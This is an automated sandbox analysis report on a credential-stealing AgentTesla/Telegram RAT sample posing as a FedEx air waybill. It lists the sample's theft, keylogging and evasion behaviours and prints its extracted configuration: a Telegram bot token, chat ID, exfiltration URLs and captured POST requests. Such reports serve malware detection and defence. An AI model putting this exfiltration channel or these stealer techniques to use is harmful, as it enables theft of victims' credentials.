
Windows Analysis Report FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe

Overview

General Information

Sample Name: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Analysis ID: 528766
MD5: 994f1f286b24022af59bc5506b1e2871
SHA1: ed961648e2e90a311a9c5e53c15eed3d95853b96
SHA256: edd31cd4c64b1d9f392c6e141a10c028cb11f9640e6eab34960baf6bdd585dc5
Tags: exe, FedEx

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Moves itself to temp directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1748127586", "Chat URL": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
(5 of 18 entries shown)

Unpacked PEs

Source | Rule | Description | Author
1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.2f09098.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.3fda280.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
(5 of 17 entries shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.12.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1748127586", "Chat URL": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument"}
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.5604.1.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendMessage"}
Multi AV Scanner detection for submitted file
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | ReversingLabs: Detection: 40%
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 1.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

Uses the Telegram API (likely for C&C communication)
Source: unknown | DNS query: name: api.telegram.org
Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
    POST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8d9b05ed69793f6
    Host: api.telegram.org
    Content-Length: 1014
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8d9b06051514af6
    Host: api.telegram.org
    Content-Length: 1900
    Expect: 100-continue
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49812
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520470982.000000000351D000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520772376.0000000003558000.00000004.00000001.sdmp | String found in binary or memory: http://api.telegram.org
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000003.487860465.0000000001630000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.518406294.0000000001633000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: http://yWRCNh.com
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520470982.000000000351D000.00000004.00000001.sdmp | String found in binary or memory: https://190L8dvjH7GrrK.net
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: https://190L8dvjH7GrrK.netP
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocumentdocument-----
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520357794.00000000034B2000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org4
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.520772376.0000000003558000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.orgD8
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp, FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.256875551.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.519080601.00000000031A1000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | HTTP traffic detected:
    POST /bot1881721018:AAFgjKCKDmGZSPG9IqaTLsC7W4rwVP8dqs0/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8d9b05ed69793f6
    Host: api.telegram.org
    Content-Length: 1014
    Expect: 100-continue
    Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.telegram.org
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49812 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File written: C:\Windows\System32\drivers\etc\hosts

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
.NET source code contains very large array initializations
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack, <PrivateImplementationDetails>{C619B418-655A-43C1-BD01-C10710B629CF}/384BCCB0-9651-44E6-A837-DA8EAFCCEF4C.cs | Large array initialization: .cctor: array initializer size 12200
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 0_2_012E8250
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 0_2_012ED2E8
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_0133E330
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_01337B00
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_01331305
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_0133D760
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_013353B0
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_0133AED0
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_01335B20
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_01335320
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_01334F4F
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_01334FF1
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_01334E08
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_01334EAF
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_0133508D
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_01334EEA
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_013350C5
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_02F949A0
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_02F948B0
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_05BBC070
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Binary or memory string: OriginalFilename vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.264554627.0000000006300000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.264453189.0000000005F80000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261292872.0000000002F26000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.261127000.0000000002EA1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamefnxmUNeuktJYbGJBbHKTVNJNqyVsDYyt.exe4 vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamefnxmUNeuktJYbGJBbHKTVNJNqyVsDYyt.exe4 vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000000.00000002.263619418.0000000003EAD000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Binary or memory string: OriginalFilename vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.515825293.0000000000FC8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000000.258283858.0000000000402000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamefnxmUNeuktJYbGJBbHKTVNJNqyVsDYyt.exe4 vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, 00000001.00000002.517602931.000000000154A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Binary or memory string: OriginalFilenameDESCKI.exe. vs FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | ReversingLabs: Detection: 40%
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File read: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe:Zone.Identifier
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe "C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe"
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Process created: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Process created: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.log
Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@3/3@2/1
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: /DESCKI;component/views/addbook.xaml
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: views/addcustomer.baml
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: views/addbook.baml
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: /DESCKI;component/views/addcustomer.xaml
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: /DESCKI;component/views/addbook.xaml
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: views/addbook.baml
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: views/addcustomer.baml
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: /DESCKI;component/views/addcustomer.xaml
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: I/DESCKI;component/views/addbook.xaml_/DESCKI;component/views/borrowfrombookview.xamlU/DESCKI;component/views/borrowingview.xamlO/DESCKI;component/views/changebook.xamlW/DESCKI;component/views/changecustomer.xamlS/DESCKI;component/views/customerview.xamlW/DESCKI;component/views/deletecustomer.xamlM/DESCKI;component/views/errorview.xamlQ/DESCKI;component/views/smallextras.xamlQ/DESCKI;component/views/addcustomer.xaml
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.400000.4.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
Source: FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.b50000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.b50000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.5.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.3.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.2.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.7.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe.db0000.9.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 0_2_00B592F5 push ds; ret 0_2_00B59340
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 0_2_00B59361 push ds; retf 0_2_00B59364
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 0_2_00B59347 push ds; ret 0_2_00B5934C
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_00DB9347 push ds; ret 1_2_00DB934C
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_00DB92F5 push ds; ret 1_2_00DB9340
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Code function: 1_2_00DB9361 push ds; retf 1_2_00DB9364
Source: initial sample | Static PE information: section name: .text entropy: 7.88525497927
Source: C:\Users\user\Desktop\FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | File created: \fedex shipment notification - air waybill fed1007990_a10792.exe

Hooking and other Techniques for Hiding and Protection:

Moves itself to temp directory
Source: c:\users\user\desktop\fedex shipment notification - air waybill fed1007990_a10792.exe | File moved: C:\Users\user\AppData\Local\Temp\tmpG721.tmp
